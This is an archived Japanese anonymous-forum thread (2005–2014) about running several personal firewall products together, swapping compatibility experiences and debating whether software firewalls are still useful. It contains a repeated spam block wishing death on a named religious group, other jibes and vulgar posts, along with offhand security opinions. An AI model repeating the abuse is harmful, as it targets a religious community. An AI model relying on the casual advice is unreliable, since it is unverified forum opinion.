413 :
名無しさん@お腹いっぱい。:2005/10/08(土) 03:58:07
いっぱい入れてるぞ。ゴルァ
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) <
>>413 おおきに!!
| | | \_____
(__)___)
415 :
名無しさん@お腹いっぱい。:2005/10/12(水) 22:03:10
メイン機:XPのFW,バスターのFW,ルーター,OCNのFW。
サブ機:XPのFW,SYGATE,ルーター,OCNのFW。
416 :
名無しさん@お腹いっぱい。:2005/10/13(木) 10:22:01
ゾーンアラームの最新版とジャトコを併用してるが特に問題はない
だがジャトコとSSM1.8.9のアプリ監視機能を併用するとPCが重くなるから注意
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) < おーい、もっと伸ばせよー。雑草が生えるぞー。
| | | \_____
(__)___)
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) <
>>419 Thanks
| | | \_____
(__)___
∧_∧
( ´∀`) / ̄ ̄ ̄ ̄ ̄
( ) < 放置プレイは勘弁して。
| | | \_____
(__)___)
422 :
名無しさん@お腹いっぱい。:2006/02/17(金) 23:12:39
4年で400レスかよw
ありえねえwwwwwww
425 :
名無しさん@お腹いっぱい。:2006/04/02(日) 18:21:29
あげ
保守
する価値ある・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・のか
VMwareでブリッジが使えないkerio PFWとか
ルールセットを作るのに疲れてしまったJetico PFWを引退させたいので実験的に
windows 2000上でwipfw(Windows版ipfw(FreeBSDのパケットフィルタ))と
ZA Free版を入れて使ってます。
なかなかいい感じです。
>>428 wipfwなんかやばそう。
MACアドレスが自分宛てでIPアドレスが自分宛てでないような
パケットが素通しになった。ログにも残っていない。
DHCPのリース切れで別のサブネットのアドレスをもらった瞬間に
nmapのポートスキャンがだだ漏れになった。
ちょっと怖いので本番は保留。
430 :
vip:2006/06/25(日) 08:10:28
黒氷はガチでいい。
AVG+黒氷+SG+NW監視ツール
之西京なり
431 :
名無しさん@お腹いっぱい。:2006/06/26(月) 16:19:08
SG入れるなら立正佼成会も入れろ矢
432 :
名無しさん@お腹いっぱい。:2006/09/14(木) 01:04:41
霊友会も
創価学会モナー
興味あるのでzoneフリーと相性のいいFW教えて欲しいな
あと、ちょっと疑問
ひょっとして起動がすごい重くなるのかな?
zoneとoutpost両方入れたら、どっちか片方消せゴルァ、と怒られた。
437 :
名無しさん@お腹いっぱい。:2007/09/15(土) 12:07:18
あは
438 :
名無しさん@お腹いっぱい。:2007/09/15(土) 13:14:10
あげ
439 :
名無しさん@お腹いっぱい。:2007/09/15(土) 13:14:52
あげ
ぞねはばっちりGTと不具合起こして起動しなくなった。
セーフモードでアンスコして今はpctools+jetico
ぞねfreeはすぐネット接続止め腐るから最悪
このスレが立った頃のセキュ板は平和だった…(遠い目)
7年かかってレス数これだけですか
そうですかwwwwww
444 :
名無しさん@お腹いっぱい。:2008/03/05(水) 12:48:24
age
久しぶりにあげ
446 :
名無しさん@お腹いっぱい。:2008/05/26(月) 01:03:09
sageてたよorz
447 :
名無しさん@お腹いっぱい。:2008/09/17(水) 17:50:17
ゴルゥア
ぬるぽ
test
450 :
名無しさん@お腹いっぱい。:2008/12/14(日) 14:48:04
7年たっても大丈夫
これはまた歴史のあるスレですねぇ
452 :
名無しさん@お腹いっぱい。:2009/11/30(月) 17:51:06
室町幕府第17代執権の時代から、脈々と続いてきたスレ。
453 :
名無しさん@お腹いっぱい。:2010/09/14(火) 18:21:59
おう
454 :
名無しさん@お腹いっぱい。:2010/09/15(水) 18:16:01
マカとtoolは全く問題なし。
とても軽い。
455 :
名無しさん@お腹いっぱい。:2010/10/16(土) 11:31:35
おまんちょ
FWっていっぱい入れちゃ良くねーんでは?
457 :
ひみつの検疫さん:2024/04/29(月) 00:40:05 ID:MarkedRes
汚染を除去しました。
458 :
名無しさん@お腹いっぱい。:2011/07/29(金) 09:01:20.39
カオスラウンジもpixivもしんで。
459 :
名無しさん@お腹いっぱい。:2011/10/14(金) 21:36:41.76
いいだろべつに
461 :
名無しさん@お腹いっぱい。:2012/02/25(土) 04:42:08.80
まんこ
462 :
名無しさん@お腹いっぱい。:2012/02/25(土) 04:42:26.18
ちんこ
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
ちょごりえ
465 :
名無しさん@お腹いっぱい。:2013/02/13(水) 01:11:12.08
10年前だったら、複数同時インスコで実験が出来たが
もう今は駄目だね
466 :
名無しさん@お腹いっぱい。:2013/02/14(木) 14:27:50.75
そんなに入んないよぉ
今の時代PFWソフトにこだわっている時点で変わり者扱いされる
市販総合セキュリティソフトも独自FW使うの取りやめて
FW部分はOS標準を使うところもいろいろ出てきているしな
バスターみたいにな、まあルータ被せてれば
基本WindowsFWでも大丈夫なんじゃね
>>466 10年前なら、複数入れることも可能だった
ソフト自体、単純な作りだったから
でも現在のセキュリティーソフトは非常に多機能で複雑で、システムの奥深くまで食い込むから
複数も入れたらトラブル続出
470 :
名無しさん@お腹いっぱい。:2013/02/15(金) 00:02:29.06
昔の重複PFW実験レスは面白いね
頻繁に使われているポートを通じて攻撃が来るんだから
PFWなんか意味ないね
ルータだけでも不必要なポートを全部塞ぐことが出来るし
>>471 典型的お馬鹿 今時珍しいね wwwwwwww
アウトバウンドの通信制御こそがキモ
しかも、信頼プログラムに成りすましての通信(Process Memory Injection)などを防ぐことが重要になってる。
>>472 お前が馬鹿なんだよ。
PFWの基本機能を知れよ。
信頼プログラムに成りすましての通信はPFWでは防げない。
ウイルススキャンや侵入検知にも似た技術が必要。
当然、PFWには判別できないし、素人も通信ログを見ただけではわからない。
普通モバイルで無ければ、NTTのゲートウェイでガードしてるから、
ソフトウェアファイアウォールなどいらない。
自宅でサーバーを開設してる奴は別。
レンタルサーバーならサーバー提供してる会社がセキュリティも担保してくれる。
475 :
名無しさん@お腹いっぱい。:2014/09/22(月) 01:22:02.86
ほほう
まあPFWが便利な点はアプリケーション毎に通信を制御できる点かな。
普通のルーターのSPIではこれはできない